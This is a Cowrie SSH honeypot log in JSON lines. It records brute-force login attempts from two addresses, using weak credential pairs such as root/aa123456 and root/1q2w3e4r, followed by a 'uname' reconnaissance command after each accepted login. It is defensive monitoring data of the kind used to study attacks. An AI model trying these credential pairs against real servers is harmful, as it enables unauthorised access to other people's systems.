{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52568,"dst_ip":"1.2.3.4","dst_port":22,"session":"7553aa3f2521","protocol":"ssh","message":"New connection: 212.227.235.229:52568 (1.2.3.4:22) [session: 7553aa3f2521]","sensor":"my-vps","timestamp":"2025-08-28T07:16:56.216162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:56.217044Z","src_ip":"212.227.235.229","session":"7553aa3f2521"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:56.464919Z","src_ip":"212.227.235.229","session":"7553aa3f2521"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T07:16:57.212404Z","src_ip":"212.227.235.229","session":"7553aa3f2521"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:58.462873Z","src_ip":"212.227.235.229","session":"7553aa3f2521"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54934,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe644c5d099","protocol":"ssh","message":"New connection: 212.227.125.160:54934 (1.2.3.4:22) [session: 7fe644c5d099]","sensor":"my-vps","timestamp":"2025-08-28T07:17:06.250265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:06.251322Z","src_ip":"212.227.125.160","session":"7fe644c5d099"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:06.468798Z","src_ip":"212.227.125.160","session":"7fe644c5d099"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T07:17:07.124146Z","src_ip":"212.227.125.160","session":"7fe644c5d099"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:08.343430Z","src_ip":"212.227.125.160","session":"7fe644c5d099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41586,"dst_ip":"1.2.3.4","dst_port":22,"session":"57f0af901f52","protocol":"ssh","message":"New connection: 212.227.235.229:41586 (1.2.3.4:22) [session: 57f0af901f52]","sensor":"my-vps","timestamp":"2025-08-28T07:17:12.791210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:12.792108Z","src_ip":"212.227.235.229","session":"57f0af901f52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:13.037276Z","src_ip":"212.227.235.229","session":"57f0af901f52"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T07:17:13.852134Z","src_ip":"212.227.235.229","session":"57f0af901f52"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:15.099439Z","src_ip":"212.227.235.229","session":"57f0af901f52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51608,"dst_ip":"1.2.3.4","dst_port":22,"session":"8021cd1111c9","protocol":"ssh","message":"New connection: 212.227.125.160:51608 (1.2.3.4:22) [session: 8021cd1111c9]","sensor":"my-vps","timestamp":"2025-08-28T07:17:22.699802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:22.700962Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:22.934579Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:17:23.595685Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:17:24.639855Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:17:24.640913Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:24.861392Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:24.862474Z","src_ip":"212.227.125.160","session":"8021cd1111c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55452,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f753c8f66f2","protocol":"ssh","message":"New connection: 212.227.235.229:55452 (1.2.3.4:22) [session: 4f753c8f66f2]","sensor":"my-vps","timestamp":"2025-08-28T07:17:29.400173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:29.401062Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:30.385976Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:17:31.852258Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:17:32.378598Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:17:32.379309Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:32.631661Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:32.633097Z","src_ip":"212.227.235.229","session":"4f753c8f66f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35120,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3fc70d0c366","protocol":"ssh","message":"New connection: 212.227.125.160:35120 (1.2.3.4:22) [session: e3fc70d0c366]","sensor":"my-vps","timestamp":"2025-08-28T07:17:39.276942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:39.277705Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:39.493522Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:17:40.142376Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:17:40.684019Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:17:40.684710Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:40.913589Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:40.914655Z","src_ip":"212.227.125.160","session":"e3fc70d0c366"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50690,"dst_ip":"1.2.3.4","dst_port":22,"session":"c856e736c8a6","protocol":"ssh","message":"New connection: 212.227.235.229:50690 (1.2.3.4:22) [session: c856e736c8a6]","sensor":"my-vps","timestamp":"2025-08-28T07:17:45.774794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:45.775432Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:46.028809Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:17:46.790807Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:17:47.384799Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:17:47.385603Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:47.640578Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:47.641810Z","src_ip":"212.227.235.229","session":"c856e736c8a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53046,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b2c6cfdad8c","protocol":"ssh","message":"New connection: 212.227.125.160:53046 (1.2.3.4:22) [session: 9b2c6cfdad8c]","sensor":"my-vps","timestamp":"2025-08-28T07:17:55.688475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:17:55.689363Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:17:55.908032Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:17:56.566180Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:17:57.102245Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:17:57.102942Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:57.809287Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:17:57.810555Z","src_ip":"212.227.125.160","session":"9b2c6cfdad8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41410,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5a4be6fabe2","protocol":"ssh","message":"New connection: 212.227.235.229:41410 (1.2.3.4:22) [session: d5a4be6fabe2]","sensor":"my-vps","timestamp":"2025-08-28T07:18:03.282995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:18:03.283948Z","src_ip":"212.227.235.229","session":"d5a4be6fabe2"}
